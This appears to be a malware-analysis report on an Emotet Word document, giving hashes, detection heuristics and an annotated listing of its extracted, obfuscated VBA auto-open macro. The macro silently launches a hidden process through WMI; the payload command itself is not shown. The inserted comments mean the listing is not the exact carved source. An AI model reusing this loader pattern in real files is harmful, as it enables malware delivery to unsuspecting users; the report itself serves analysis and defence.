Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 927deff64a184119…

MALICIOUS

Office (OLE)

127.8 KB Created: 2019-05-22 12:41:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: acad15ff3538551dd16b18c4ad9fa132 SHA-1: 6386c1886c48eba568499598e87869510e8f9a11 SHA-256: 927deff64a1841190fc4e11a755533e328e2c297c1eb38d8046fe3558eb4c830
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 Signed Binary Proxy Execution: Rundll32

The sample is a malicious Office document containing an obfuscated VBA macro. Its autoopen subroutine builds the WMI moniker winmgmts:win32_process from string fragments, obtains a Win32_ProcessStartup object with ShowWindow = 0 (hidden window), and calls Win32_Process.Create to spawn a new process — i.e. WMI-based execution (T1047) rather than a direct Shell call. The command line is assembled from two MSForms TextBox controls on the document module, so the actual command (likely a PowerShell downloader, but not recoverable from the macro text alone) is not present in the extracted macro source; no rundll32 invocation is visible in the recovered macro either. This WMI-launch pattern, padded with junk Debug.Print statements, is characteristic of Emotet maldocs of this period.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note: for this sample a VBA project was in fact recovered — see the extracted macros.bas below — so this marker is redundant with the VBA findings above and should not be read as a separate execution path.)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — standard OOXML DrawingML namespace URI present in ordinary Office files; not a network indicator for this sample, and not the payload download URL (which is not recoverable from the macro source, see the extracted macro notes).

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3177 bytes
SHA-256: 55ab2ad968f793a5833e29eae0e781f520777c6117cf9b41f877d10e93237fbf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "pC7jD6"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "qiQicnD3, 0, 0, MSForms, TextBox"
Attribute VB_Control = "m85VQQ, 1, 1, MSForms, TextBox"

Attribute VB_Name = "zf5QvS"
' Auto-exec entry point: Word runs a Sub named autoopen as soon as the document
' is opened with macros enabled (the OLE_VBA_AUTOOPEN finding above). Every
' Debug.Print statement in this module just concatenates random-looking literals
' and hands the result to Debug.Print; none of those strings is referenced
' again, so they are padding around the real logic rather than encoded payload.
' The only statement that matters here is the call to VooVDtz8.
Public Sub _
autoopen()
   Debug.Print _
"953" + ("57") + ("SHVTGNQ" + ("274" + "938") + "wVvkIj" + ("zGE6t7c"));
Debug _
.Print "429" _
+ ("722") + ("ZBDvJzoR" + ("755" + "879") + "sa34d4" + ("d2iIdSN"));
Debug.Print "615" + ("395") + _
("clBiI6ll" + ("796" + "479") + "j45Nf3C" + ("aJVoi7S"));
' uGGhl1 is never declared or assigned in the recovered source, and VooVDtz8
' does not read its parameter, so this is effectively a bare call into the
' WMI process-launch routine.
VooVDtz8 (uGGhl1)
   Debug.Print _
"63" + ("965") + ("Jl5QY6Q" + ("713" + "78") + "d86Uow" + ("i0XK2w"));
Debug _
.Print "664" _
+ ("829") + ("jEHju7" + ("525" + "155") + "ncCzqR" + ("i1fM0o_j"));
Debug.Print "815" + ("427") + _
("lFGdZhJ" + ("40" + "207") + "Z55jI7kf" + ("mOUuiGdh"));
End Sub
' Launches the payload through WMI: assembles the "winmgmts:" moniker from
' fragments, obtains a Win32_ProcessStartup object to hide the new window, then
' calls Win32_Process.Create. The parameter FYdqVk is never read in this body.
' Keep this listing byte-identical to the carved artifact (SHA-256 above) --
' comments only.
Sub VooVDtz8(FYdqVk)
' Builds "winmgmts:win32_process" from "win" + "mgmts:w" + "in32_process" so the
' WMI moniker never appears as a single literal in the source. H9JGmzz3 wraps
' each piece in two variables that have no declaration or assignment in view;
' if nothing outside this extract sets them it returns its input unchanged, so
' this is obfuscation, not decryption -- confirm against the module cut off
' below (HwQKGUJl).
RWvjiu = H9JGmzz3(H9JGmzz3("win" + H9JGmzz3(H9JGmzz3("mgmts:w")) + "in32_process"))
   Debug.Print _
"571" + ("844") + ("XUrtUowo" + ("208" + "85") + "dAf8Nd" + ("VS2cAhuq"));
Debug _
.Print "931" _
+ ("41") + ("mpBuV6_" + ("73" + "394") + "iS3moV" + ("F1tSJiO"));
Debug.Print "716" + ("787") + _
("lK4vR5" + ("989" + "757") + "Z8VBGR" + ("wGVXaG"));
' GetObject("winmgmts:win32_processstartup") -> a Win32_ProcessStartup instance
' (the OLE_VBA_GETOBJ finding). It becomes the startup-info argument to Create.
Set mLWSc26 = GetObject(H9JGmzz3(H9JGmzz3(RWvjiu + "startup")))
   Debug.Print _
"624" + ("107") + ("BnVViU" + ("263" + "938") + "JjFbOUG" + ("zodBoXC5"));
Debug _
.Print "663" _
+ ("264") + ("VUcid9b" + ("587" + "45") + "GNB7qA2" + ("PN2ailr0"));
Debug.Print "444" + ("424") + _
("KswMo8vW" + ("669" + "740") + "AVzmbW" + ("ElUNdB74"));
' (0 / 1) evaluates to 0; ShowWindow = 0 corresponds to SW_HIDE, so the spawned
' process gets no visible window.
mLWSc26 _
.ShowWindow = (0 / 1)
   Debug.Print _
"89" + ("438") + ("GsBaDO" + ("718" + "808") + "rXzdt3" + ("EUBls0_R"));
Debug _
.Print "772" _
+ ("912") + ("HcqHLop" + ("898" + "774") + "ozu6P8n" + ("PYWCSh"));
Debug.Print "8" + ("44") + _
("Xwha0Xrq" + ("292" + "84") + "wmzPz9Dv" + ("XNOvGo"));
' Execution sink: Create on the Win32_Process class; per the WMI documentation
' its arguments are (CommandLine, CurrentDirectory, ProcessStartupInformation,
' ProcessId). The command line is "p" followed by the contents of the two
' MSForms TextBox controls m85VQQ and qiQicnD3 declared on the document module
' pC7jD6 (see the Attribute VB_Control lines at the top of this extract). Those
' control values are NOT part of the recovered macro text, so the real command
' is not visible here; the leading "p" plus the Emotet attribution suggest a
' PowerShell launcher, but that needs the form/stream data to confirm.
' jdABuPY, cQVX3cc, CvC0qa and QMNQD2o have no declaration in view, so they are
' presumably Empty and contribute nothing. The return value only goes to
' Debug.Print; the side effect is the process creation.
Debug.Print GetObject(H9JGmzz3(RWvjiu)).Create(jdABuPY + H9JGmzz3("p") + pC7jD6.m85VQQ + pC7jD6.qiQicnD3 + cQVX3cc, CvC0qa, mLWSc26, QMNQD2o);
   Debug.Print _
"748" + ("853") + ("R4oDMqO" + ("737" + "650") + "CtwNJu" + ("IVOMH0wn"));
Debug _
.Print "384" _
+ ("794") + ("DXdLRj_K" + ("165" + "239") + "VI7sJrhT" + ("nPHrhF"));
Debug.Print "415" + ("48") + _
("OJEqPk7k" + ("754" + "372") + "jhz_CEdr" + ("m0mOEl"));
End Sub
' Decoy "decoder": returns fpJ1zkF + pJNhqU + a1cnM8H. Neither fpJ1zkF nor
' a1cnM8H is declared or assigned anywhere in the recovered source, so unless a
' module not shown here (e.g. HwQKGUJl, which begins right after this one) sets
' them, both are Empty and the function is an identity wrapper around its
' argument. The nested calls in VooVDtz8 therefore only fragment the WMI
' moniker; nothing is actually decrypted. The Debug.Print lines are the same
' junk padding used throughout the module.
Function H9JGmzz3(pJNhqU)
   Debug.Print _
"692" + ("479") + ("cPFL19M" + ("440" + "53") + "kNBSwdX" + ("lpMXuj"));
Debug _
.Print "605" _
+ ("274") + ("hEAN8S" + ("761" + "924") + "iK2h6zrd" + ("AT2lq4Ct"));
Debug.Print "447" + ("322") + _
("BBvUsAF_" + ("4" + "550") + "iizpc91" + ("dBUNZhDQ"));
' With Empty operands, "+" leaves the string operand unchanged; if either
' variable were assigned elsewhere it would be prepended/appended here.
H9JGmzz3 = fpJ1zkF + pJNhqU + a1cnM8H
   Debug.Print _
"943" + ("722") + ("VmVi3sc" + ("719" + "97") + "B1NFcp" + ("HhZG8Xf4"));
Debug _
.Print "174" _
+ ("409") + ("j5ZWXh5" + ("647" + "998") + "T7JV8pS" + ("YB79AjY"));
Debug.Print "109" + ("377") + _
("QOVXHb" + ("853" + "714") + "rsw5BLwB" + ("tjYDp9"));
End Function


Attribute VB_Name = "HwQKGUJl"